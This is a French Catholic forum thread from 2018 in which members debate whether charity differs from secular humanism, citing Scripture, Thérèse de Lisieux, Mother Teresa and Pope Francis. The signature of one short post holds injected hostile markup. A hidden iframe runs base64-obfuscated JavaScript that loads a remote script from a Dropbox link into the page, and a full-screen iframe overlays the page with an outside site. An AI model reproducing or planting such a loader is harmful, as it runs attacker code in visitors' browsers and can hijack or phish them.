DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE

Théologie Spirituelle Catholique
Pour déposer une intention de prière : Agapé
ATTENTION : Les publicités ci-dessous sont indépendantes de notre volonté !
 
AccueilAccueil  PortailPortail  S'enregistrerS'enregistrer  Connexion  

Partagez | 
 

 la charité et l'humanisme ?

Aller en bas 
AuteurMessage
Invité
Invité



MessageSujet: la charité et l'humanisme ?   9/3/2018, 16:01

Ce topic tombe pile, car j'avais justement l'intention d'en ouvrir un pour essayer d'analyser la différence entre "charité" et "humanisme" ?

On en parle beaucoup sur ce forum "d'humanisme sans Dieu", qu'est-ce que cela veut dire ?

Est-ce que Sainte Mère Teresa ou l'Abbé Pierre ont fait "plus" que ne le font les "restaurants du cœur" ou "médecins sans frontières" ?

Est-ce que aider son voisin est "charitable" ou tout simplement "la solidarité" ?

Les infirmières, les médecins qui ne comptent pas leurs heures de travail sont-ils des humanistes ou sont charitables quand ils parlent gentiment à leurs malades ?

La différence que j'ai trouvée, c'est que la charité, comme le dit Tabris plus haut est une vertu

Citation :

Mon Dieu, je vous aime de tout mon cœur, et par dessus toutes choses, parce que vous êtes infiniment bon et infiniment aimable, et j’aime mon prochain comme moi-même pour l’amour de vous.

Voilà la différence : "j'aime mon prochain comme moi-même, pour l'amour de Vous"

Voir dans celui que l'on aide un autre moi-même, fils lui aussi de Dieu et le secourir par amour de Dieu.

Je pense qu'on ne peut comprendre cela que par la prière.

Cela me fait penser à des toutes petites choses qui énervent comme Ste Thérèse de Lisieux qui était agacée par sa voisine de stalle, parce qu'elle faisait du bruit en égrenant son chapelet. Et Ste Thérèse a offert cet agacement à Jésus.

Je n'engage que moi avec cette petite analyse. Qu'en pensez-vous ?
Revenir en haut Aller en bas
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   9/3/2018, 19:23

Ce que j'en pense, c'est que c'est tout à fait ce que vous dites.

Voici quelques vidéos là-dessus :


Un humanisme sans Dieu est-il possible ?




Notre société occidentale se revendique largement de la tradition humaniste qui puise ses racines dans l'héritage de la Renaissance et la pensée des Lumières.

Sur ces bases, elle multiplie les engagements humanitaires, politiques et associatifs au service de l'homme.

En même temps, cet humanisme, qui s'est coupé de son origine théologique depuis les Lumières, peut-il, sans vision transcendante, donner une juste vision de l'homme, de sa nature et de sa destinée, qui puisse servir de fondement à l'édification d'un monde meilleur ?

Avec la participation de Jean-Claude Guillebaud (essayiste) et Fabrice Hadjadj (philosophe).


Sainte Thérèse de Lizieux ("Histoire d'une âme") : ce qu'est la Charité




Lecture du manuscrit de Sainte Thérèse de Lisieux, "Histoire d'une âme", Chapitre X "L'épreuve de la foi" (1896-1897), "Ce qu'est la charité".



Mère Téresa - La religion de l'amour







Rencontre entre le Cardinal Lustiger et Mère Teresa


Revenir en haut Aller en bas
lion-des-bois

avatar

Masculin Messages : 4153
Inscription : 26/01/2010

MessageSujet: Re: la charité et l'humanisme ?   9/3/2018, 19:49

La charité est avant tout l'amour de Dieu, et dans l'amour de Dieu, on peut ensuite aimer notre prochain

Dans l'humanisme sans Dieu, il ne reste plus que l'homme tout seul pour essayer d'aimer, sans lumière, confondant l'Amour avec amour propre, besoin de l'autre, désir, liberté de faire comme je veux, etc, sans d'autres repères que soi-même non éclairé par Dieu, non purifié des péchés, donc en étant persuadé de faire le bien, fait le mal.
Revenir en haut Aller en bas
lion-des-bois

avatar

Masculin Messages : 4153
Inscription : 26/01/2010

MessageSujet: Re: la charité et l'humanisme ?   9/3/2018, 19:55

La charité est effectivement une vertu, qui selon Saint-Thomas, infuse les autres vertus, perfectionne donc les autres vertus, dont les principales sont foi, espérance et charité (vertus théologales), et prudence, justice, tempérance, force (vertus morales).

Effectivement cela coule de source que plus on est dans la charité et au mieux les autres vertus peuvent être appliquées.
Revenir en haut Aller en bas
Zaratoustra



Masculin Messages : 14
Inscription : 27/02/2018

MessageSujet: Re: la charité et l'humanisme ?   9/3/2018, 20:39

Pardon Blanche neige, d'avoir fais déplacé votre message Embarassed

_________________
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
RenéMatheux



Masculin Messages : 16325
Inscription : 28/06/2008

MessageSujet: Re: la charité et l'humanisme ?   9/3/2018, 23:13

Dans la charité on renonce à quelque chose pour l'autre! Gratutitement

Si on fait des ouevres de charité pour briller en société, alors Jesus le dit "on a déjà sa récompense".

Bref! Cela dépend de l'intention que l'on a au fond du coeur!
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 13:52

Aujourd'hui, journée de collecte des restos du cœur : charité ou humanisme de donner quelque chose ?
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1643
Inscription : 10/06/2009

MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 17:29

Ni charité ni humanisme chez les riches capitalistes .
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 18:27

Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.
Revenir en haut Aller en bas
humanlife



Masculin Messages : 10018
Inscription : 07/11/2013

MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 19:11

blanche neige a écrit:
Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.

ce n'est pas très charitable de dire cela..
Revenir en haut Aller en bas
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 21:43

humanlife a écrit:
blanche neige a écrit:
Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.

ce n'est pas très charitable de dire cela..

qu'est-ce qui n'est pas charitable ? de dire que ceux qui vont au resto du cœur sont des riches capitalistes ou bien de demander à Pascal de ne pas dire n'importe quoi ?

En tout cas, la réponse à la question, personne n'y a répondu.
Revenir en haut Aller en bas
humanlife



Masculin Messages : 10018
Inscription : 07/11/2013

MessageSujet: Re: la charité et l'humanisme ?   10/3/2018, 21:51

Violette3 a écrit:
humanlife a écrit:
blanche neige a écrit:
Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.

ce n'est pas très charitable de dire cela..

qu'est-ce qui n'est pas charitable ? de dire que ceux qui vont au resto du cœur sont des riches capitalistes ou bien de demander à Pascal de ne pas dire n'importe quoi ?

En tout cas, la réponse à la question, personne n'y a répondu.

pascal n'a pas évoqué les restos du cœur, sa remarque était générale, par ailleurs pour ceux qui parlent de charité, ne doivent-ils pas montrer l'exemple envers leur prochain même si une remarque ne leur plaît pas??

charité ou humanisme de donner aux restos du cœur??: les deux peut-être.
humanisme et charité peuvent être opposés, mais peut-être peuvent-ils aussi être complémentaires.
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 01:32

Selon moi, il y a un tres grand fossé entre l humanisme
et la charité.

c est comme la difference entre
payer ses impots pour payer les ecoles, la CMU, les hôpitaux, le rsa, la secu, les sieges pour les handicapés etc....

ou alors, La Charité,
qui est donner la piece au mendiant.


C est profondément different, je crois.
Revenir en haut Aller en bas
boulo
Administrateur


Masculin Messages : 12458
Inscription : 25/12/2011

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 06:23

Vous n'avez pas dit quelle était cette différence , Bassmeg . Alors que vous étiez implicitement priée de l'exposer dans " Bassmeg présente sa vision du christianisme " .
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 06:53

blanche neige a écrit:
Ce topic tombe pile, car j'avais justement l'intention d'en ouvrir un pour essayer d'analyser la différence entre "charité" et "humanisme" ?

On en parle beaucoup sur ce forum "d'humanisme sans Dieu", qu'est-ce que cela veut dire ?

Est-ce que Sainte Mère Teresa ou l'Abbé Pierre ont fait "plus" que ne le font les "restaurants du cœur" ou "médecins sans frontières" ?

Si l'homme ne vivait que de pain et si le sens de la vie donné par Dieu ne comptait pas, il n'y aurait effectivement pas de différence entre les Partis politiques Européens qui, effectivement, ont réussi plus que dans toute l'histoire de l'humanité à faire reculer la misère MATERIELLE en Europe.

Mais ces Partis sont SANS DIEU, sans le SENS ULTIME DE LA VIE.

Alors vous voyez ce monde magnifique se racrapoter dans une angoisse qu'il ne comprend pas.

Le livre de la Sagesse, vers 50 avant Jésus Christ, décrivait déjà le phénomène de la famine spirituelle :

Citation :
Sagesse 17, 4 Car le réduit qui les abritait ne les préservait pas de l’angoisse ; des bruits effrayants retentissaient autour d'eux, et des spectres lugubres, au visage morne, leur apparaissaient.
Sagesse 17, 5 Aucun feu n'avait assez de force pour les éclairer, et l'éclat étincelant des étoiles ne parvenait pas à illuminer cette horrible nuit.
Sagesse 17, 6 Seule brillait pour eux une masse de feu qui s'allumait d'elle-même, semant la peur, et, terrifiés, une fois disparue cette vision, ils tenaient pour pire ce qu'ils venaient de voir.
Sagesse 17, 7 Les artifices de l'art magique (la psychiatrie) demeuraient impuissants, et sa prétention à l'intelligence était honteusement confondue ;
Sagesse 17, 8 car ceux (les thérapeutes du psychisme) qui promettaient de bannir de l'âme malade les terreurs et les troubles étaient eux-mêmes malades d'une peur ridicule.
Revenir en haut Aller en bas
http://eschatologie.free.fr
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 06:56

Bref, en se passant de Dieu, l'humanisme a fait disparaître la misère matérielle et a créé la misère de l'âme.
Citation :


Deutéronome 8, 3 Dieu t'a humilié, il t'a fait sentir la faim, pour te montrer que l'homme ne vit pas seulement de pain, mais que l'homme vit de tout ce qui sort de la bouche de Yahvé.
Revenir en haut Aller en bas
http://eschatologie.free.fr
humanlife



Masculin Messages : 10018
Inscription : 07/11/2013

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 08:10

C'est vraiment un sujet intéressant. Merci à Zarathoustra d'avoir comme qui dirait "involontairement" initié le sujet, car je pense qu'il y a beaucoup à dire, et surtout à réfléchir sur la question.

Il ne faut pas forcément opposer charité et humanisme je pense, car l'humanisme correspond aussi à une évolution du monde moderne, dans laquelle la religion a une place différente que dans le monde ancien.

Donc il faut penser l'humanisme d'un certain côté comme une laïcisation de la charité, selon moi.

Les dérives morales et éthiques du monde contemporain auxquelles est associé l'humanisme sont pourtant bien réelles, mais sont aussi le fruit du comportement des hommes, comme aussi par le passé la religion a pu créer des excès par rapport au pouvoir et à l'influence sur la société.

Le message du Christ est un humanisme fondé sur une Transcendance. Lorsqu'il abolit toutes les différences entre les hommes, quelles que soient leurs classes sociales, et lorsqu'il montre qu'il faut aller vers les plus défavorisés, il fonde un humanisme radical. Même s'il agit au nom de Dieu, on peut très bien garder la vision humaniste sans forcément croire en Dieu. Le message – amour du prochain, justice sociale, non-violence, pardon – peut être vécu par les non-croyants. Le Christ, par son message, n'appartient pas qu'aux croyants.

Frédéric Lenoir, Le Christ Philosophe, 2008

http://temoignagechretien.fr/articles/religion-monde/le-christianisme-est-un-humanisme
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3100
Inscription : 09/08/2014

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 09:01

"Des pauvres, vous en aurez toujours avec vous", dit Jésus à Judas...(Jean 12, 8)

Sinon, Jésus aurait pu, au désert quand le diable humaniste le tentait, transformer toutes les pierres en pains, et régner matériellement sur le monde et faire en sorte que le bien-être matériel règne pour toujours.
La charité ne sert pas seulement à contenter matériellement tout le monde, mais c'est aussi et surtout une éducation au détachement pour celui qui donne.

En plus, il dit que celui qui fait passer le Royaume avant le reste reçoit ce dont il a besoin, ce qui est logique puisque du même coup, il ne recherche plus les biens matériels qu'il n'a pas et se contente de ce qu'il a.

La différence avec l'humanisme est que quand on donne à une association, on ne rencontre pas le nécessiteux, mais seulement une idée qui est de réduire la charité à une action matérielle et ponctuelle, et acheter ainsi une bonne conscience.
Le riche c'est celui qui réduit tout à l'argent, même s'il est pauvre et qu'il ne rêve que de gagner un jour à la loterie...
Le riche, c'est notre mental qui sait à merveille comptabiliser les bonnes actions et s'attribuer les plus hauts mérites.
Qui saura résister à l'accusateur qui, via les médias, vient titiller notre culpabilité ?

La charité c'est d'abord un état d'esprit qui procède d'une bonne connexion christique et qui sait soigner là où ça fait mal, elle nous attend au contour quand nous l'attendons pas, ce n'est pas un devoir, une morale, mais un élan du coeur, l'expression de l'intelligence divine à travers nous.
Je suis le cep, vous êtes les sarments. Celui qui demeure en moi et en qui je demeure porte beaucoup de fruit, car sans moi vous ne pouvez rien faire. Jean 15, 5

Bref, on a tous un riche et un pauvre à l'intérieur de nous Smile
Revenir en haut Aller en bas
humanlife



Masculin Messages : 10018
Inscription : 07/11/2013

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 09:28

pour ma part je pense qu'il ne faut pas entrer dans une logique de division sur des concepts qui ne sont pas forcément antagonistes quand on réfléchit aux déterminants historiques et sociaux de leur émergence.

Ce sont les hommes qui agissent en fin de compte, et si on regarde les actions de médecins sans frontières, Unicef ou autres actions humanitaires dans les pays pauvres , on comprend bien le lien culturel entre humanisme et christianisme dans l'histoire, comme je l'ai évoqué à travers le texte de Frédéric Lenoir.
---------------------------


Voyons un autre aspect de la question présenté par le pape François

Le pélagianisme et le gnosticisme "empêchent" le véritable humanisme chrétien.

Le Pape François a commencé son discours du Ve Congrès ecclésial national italien sur « Le nouvel humanisme en Jésus Christ » en déclarant qu’on ne peut parler d’humanisme sans commencer par la centralité de Jésus.

« C’est la contemplation du visage de Jésus crucifié et ressuscité qui recompose notre humanité, même fragmentée par les difficultés de la vie ou marquée par le péché (…) C’est le misericordiae vultus. Laissons-nous être regardé par lui. Jésus est notre humanisme ».

25 novembre 2015

https://fr.aleteia.org/2015/11/25/le-pape-francois-et-les-secrets-du-veritable-humanisme-chretien/
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3100
Inscription : 09/08/2014

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 10:14

Citation :
pour ma part je pense qu'il ne faut pas entrer dans une logique de division sur des concepts

Tu mets un lien sur le pape qui essaie d'introduire le concept "d'humanisme chrétien" alors que le chrétien devrait être libre de tout concept.

Le Pape a souligné les trois traits du véritable "humanisme chrétien" :'humilité, désintéressement et la béatitude.
Oui, ces trois choses viennent de la vie en Christ, mais pourquoi rajouter le mot "humanisme" ?

Sinon, on retrouve bien ces trois choses dans ce que je disais plus haut et qui ne sont pas des concepts, mais des états d'esprit ou d'âme...
Humilité de savoir qu'on ne peut rien faire de vrai et de juste, sans l'enseignement du Christ qui nous enseigne à discerner quelles sont nos motivations.
Désintéressement, quand on a discerné quelle est la motivation qui nous guide, et après avoir éliminé l'ego qui veut faire l'Ange  :greenange:
Béatitude du pauvre en esprit, c'est à dire, pauvre en mental, qui ne calcule plus selon le monde.

Le pape critique le gnostique, et pourtant c'est bien la connaissance de soi qui amène à séparer le bon grain de l'ivraie, qui discerne entre l'intérêt quelconque et le désintéressement.

Je crois qu'il va y avoir un net retour au gnosticisme, à la connaissance de soi/Soi, parce que le concept de la fourmilière humaine a fait son temps, et on en voit ses dérives : après l'humanisme, le transhumanisme...le bonheur pour tous, et nous coincer éternellement dans cette dimension temporelle Smile
Revenir en haut Aller en bas
humanlife



Masculin Messages : 10018
Inscription : 07/11/2013

MessageSujet: Re: la charité et l'humanisme ?   11/3/2018, 10:58

J&B a écrit:
Citation :
pour ma part je pense qu'il ne faut pas entrer dans une logique de division sur des concepts

Tu mets un lien sur le pape qui essaie d'introduire le concept "d'humanisme chrétien" alors que le chrétien devrait être libre de tout concept. Smile
Les hommes (les personnes) se laissent souvent attirées par les modes culturelles de leur époque et les idées réductrices qui sont liées à l'emprise du présent sur les esprits, voyant dans les contradictions du monde un horizon indépassable, et se laissent tenter par des approches simplistes comme solution aux problèmes posés sur des problématiques qui relèvent en vérité de mouvements plus importants de la pensée et de la culture.

Nous n'avons pas plus besoin de la gnose aujourd'hui qu'hier, en tant que nous avons la parole de l'Evangile qui peut nous éclairer sur le chemin de la connaissance de la vie de l'esprit et du discernement.

L'humanisme Chrétien est un courant important de la pensée moderne, qui correspond à l'évolution de la société depuis la renaissance, et à la place de la religion dans la société.

Donc on en revient toujours à la même question au-delà des débats d'idées qui peuvent facilement n'être qu'une illusion qui masque la véritable question du comportement de chacun pour soi et pour les autres dans la vie de tous les jours.
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1643
Inscription : 10/06/2009

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 17:18

blanche neige a écrit:
Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.

Bah vous ne savez pas lire, j'ai écrit que les gros riches ne sont ni charitables ni humanistes . C'est insultant ?

Nul ne peut servir deux maîtres, ou il haïra l’un et aimera l’autre, ou il s’attachera à l’un et méprisera l’autre. Vous ne pouvez servir Dieu et l’argent.» (Mt 6, 24) .

Qui dit n'importe quoi ?
Revenir en haut Aller en bas
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 19:28

Pascal a écrit:
blanche neige a écrit:
Pascal a écrit:
Ni charité ni humanisme chez les riches capitalistes .

Pascal, vous ne pouvez pas arrêter de dire n'importe quoi ? comme si ceux qui vont aux resto du cœur sont des riches capitalistes ! c'est navrant de vous lire.

Bah vous ne savez pas lire, j'ai écrit que les gros riches ne sont ni charitables ni humanistes . C'est insultant ?

Nul ne peut servir deux maîtres, ou il haïra l’un et aimera l’autre, ou il s’attachera à l’un et méprisera l’autre. Vous ne pouvez servir Dieu et l’argent.» (Mt 6, 24) .

Qui dit n'importe quoi ?

Il me semble qu'il n'est pas question ici "des gros riches" mais des bénévoles qui récoltent des denrées à la sortie des magasins,  pour la distribution aux nécessiteux.

Donc, oui, vous étiez bien à côté de la plaque.
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 19:47

Attention, je ne dis pas que l'humanisme est entièrement mauvais.

Je dis juste que l'humanisme sans Dieu conduit tôt ou tard à l'oubli de l'homme.

Voici ce que Dit Jésus de ce qu'il y a de bon dans l'humanisme :

Citation :
Matthieu 25, 34 Alors le Roi dira à ceux de droite : Venez, les bénis de mon Père, recevez en héritage le Royaume qui vous a été préparé depuis la fondation du monde.
Matthieu 25, 35 Car j'ai eu faim et vous m'avez donné à manger, j'ai eu soif et vous m'avez donné à boire, j'étais un étranger et vous m'avez accueilli,
Matthieu 25, 36 nu et vous m'avez vêtu, malade et vous m'avez visité, j’étais en prisons et vous êtes venus me voir.
Matthieu 25, 37 Alors les justes lui répondront : Seigneur, quand nous est-il arrivé de te voir affamé et de te nourrir, assoiffé et de te désaltérer,
Matthieu 25, 38 étranger et de t'accueillir, nu et de te vêtir,
Matthieu 25, 39 malade ou prisonnier et de venir te voir ?
Matthieu 25, 40 Et le Roi leur fera cette réponse : En vérité je vous le dis, dans la mesure où vous l'avez fait à l'un de ces plus petits de mes frères, c'est à moi que vous l'avez fait.
Revenir en haut Aller en bas
http://eschatologie.free.fr
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:05

Arnaud Dumouch a écrit:
Je dis juste que l'humanisme sans Dieu conduit tôt ou tard à l'oubli de l'homme.

J'aurais dit le contraire : que ça conduit à l'oubli de Dieu.

« Quand je parlerais les langues des hommes et des anges, si je n'ai pas la charité, je ne suis plus qu'airain qui sonne ou cymbale qui retentit.
(2) Quand j'aurais le don de prophétie et que je connaîtrais tous les mystères et toute la science, quand j'aurais la plénitude de la foi, une foi à transporter des montagnes, si je n'ai pas la charité, je ne suis rien.
(3) Quand je distribuerais tous mes biens en aumônes, quand je livrerais mon corps aux flammes, si je n'ai pas la charité, cela ne me sert de rien.
(4) La charité est longanime ; la charité est serviable ; elle n'est pas envieuse ; la charité ne fanfaronne pas, ne se gonfle pas ;
(5) elle ne fait rien d'inconvenant, ne cherche pas son intérêt, ne s'irrite pas, ne tient pas compte du mal ;
(6) elle ne se réjouit pas de l'injustice, mais elle met sa joie dans la vérité.
(7) Elle excuse tout, croit tout, espère tout, supporte tout.
(8) La charité ne passe jamais. Les prophéties ? Elles disparaîtront. Les langues ? Elles se tairont. La science ? Elle disparaîtra.
(9) Car partielle est notre science, partielle aussi notre prophétie.
(10) Mais quand viendra ce qui est parfait, ce qui est partiel disparaîtra.
(11) Lorsque j'étais enfant, je parlais en enfant, je pensais en enfant, je raisonnais en enfant ; une fois devenu homme, j'ai fait disparaître ce qui était de l'enfant.
(12) Car nous voyons, à présent, dans un miroir, en énigme, mais alors ce sera face à face. A présent, je connais d'une manière partielle ; mais alors je connaîtrai comme je suis connu.
(13) Maintenant donc demeurent foi, espérance, charité, ces trois choses, mais la plus grande d'entre elles, c'est la charité. »

Première lettre de Saint Paul aux Corinthiens (1 Co 13, 1-13) traduite par la Bible de Jérusalem
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:07

Dieu est déjà oublié dans l'humanisme sans Dieu.
Revenir en haut Aller en bas
http://eschatologie.free.fr
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:21

Arnaud Dumouch a écrit:
Dieu est déjà oublié dans l'humanisme sans Dieu.

ça dépend ! car je pense à Ste Mère Teresa qui devait être claquée le soir, ça ne l'empêchait certainement pas de prier malgré tout.

Et elle faisait de l'humanisme, tout comme le font ceux qui font les maraudes pour chercher les sdf la nuit ou ceux qui récoltent les denrées pour les restos du cœur.

On est dans "l'action" et on aurait tendance à oublier Dieu : c'est pour cela que pour moi du moins, le mouvement de  l'Action Catholique est important : dans les révisions de vie, nous cherchons "le Visage de Dieu".
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:24

Violette, Mère Teresa n'a rien à voir avec l'humanisme sans Dieu !!!!!

L'humanisme avec Dieu (= le message du Christ) n'a rien à voir avec l'humanisme sans Dieu.

Ne me dites pas que vous identifiez l'intention et l'action de saint Vincent de Paul et celle d'une assistante sociale actuelle !
Revenir en haut Aller en bas
http://eschatologie.free.fr
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:26

Arnaud Dumouch a écrit:
Violette, Mère Teresa n'a rien à voir avec l'humanisme sans Dieu !!!!!

L'humanisme avec Dieu (= le message du Christ) n'a rien à voir avec l'humanisme sans Dieu.

Ne me dites pas que vous identifiez l'intention et l'action de saint Vincent de Paul et celle d'une assistante sociale actuelle !

Il y a des assistantes sociales qui sont catholiques et même religieuses.

Ce que je voulais dire, c'est que SANS LA PRIERE, nous tomberions TOUS dans l'humanisme sans Dieu.
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 86547
Inscription : 19/05/2005

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 20:32

Les assistantes sociales chrétiennes ne sont pas humanistes sans Dieu.

Et si elles agissent selon le sens de la vie qui les porte, jamais elle n'envisageront l'euthanasie pour une personne âgée malade.

Elles envisageront les soins palliatifs.

L'une des plus terribles confusions depuis 50 ans, qui a été la perte des dirigeants du MRJC, c'est justement cette confusion entre humanisme chrétien et humanisme sans Dieu.

Or, celui qui n'est plus branché sur le Christ est comme le sarment qui se dessèche.
Revenir en haut Aller en bas
http://eschatologie.free.fr
Violette7
Administrateur
avatar

Féminin Messages : 4818
Inscription : 23/06/2017

MessageSujet: Re: la charité et l'humanisme ?   12/3/2018, 21:25

Arnaud Dumouch a écrit:
Les assistantes sociales chrétiennes ne sont pas humanistes sans Dieu.

Et si elles agissent selon le sens de la vie qui les porte, jamais elle n'envisageront l'euthanasie pour une personne âgée malade.

Elles envisageront les soins palliatifs.

L'une des plus terribles confusions depuis 50 ans, qui a été la perte des dirigeants du MRJC, c'est justement cette confusion entre humanisme chrétien et humanisme sans Dieu.

Or, celui qui n'est plus branché sur le Christ est comme le sarment qui se dessèche.

Pourquoi tu parles là du MRJC comme s'il n'y avait que ce mouvement là dans l'Action Catholique ?
Je te rappelle quand même que les assistantes sociales (en France du moins) n'ont pas souvent leur mot à dire au sujet de l'euthanasie, mais contre l'avortement, là oui. Si elles font leur boulot correctement, elles trouvent des solutions pour la future maman et bébé et parfois même arrivent à rabibocher les parents avec la fille.

mais où je suis d'accord avec toi, c'est que celui qui n'est plus branché sur le Christ, qui ne prie plus, se dessèche et cela sans même s'en rendre compte.
Revenir en haut Aller en bas
Contenu sponsorisé




MessageSujet: Re: la charité et l'humanisme ?   

Revenir en haut Aller en bas
 
la charité et l'humanisme ?
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» La charité n’est pas un humanisme
» Le salut par la charité (Théologie catholique)
» L'HUMANISME c'est quoi pour vous?
» La charité dans l'Eglise
» La Vérité dans la Charité (Dom Marmion)

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE :: Témoignages, discernement, cas concrets ╬-
Sauter vers: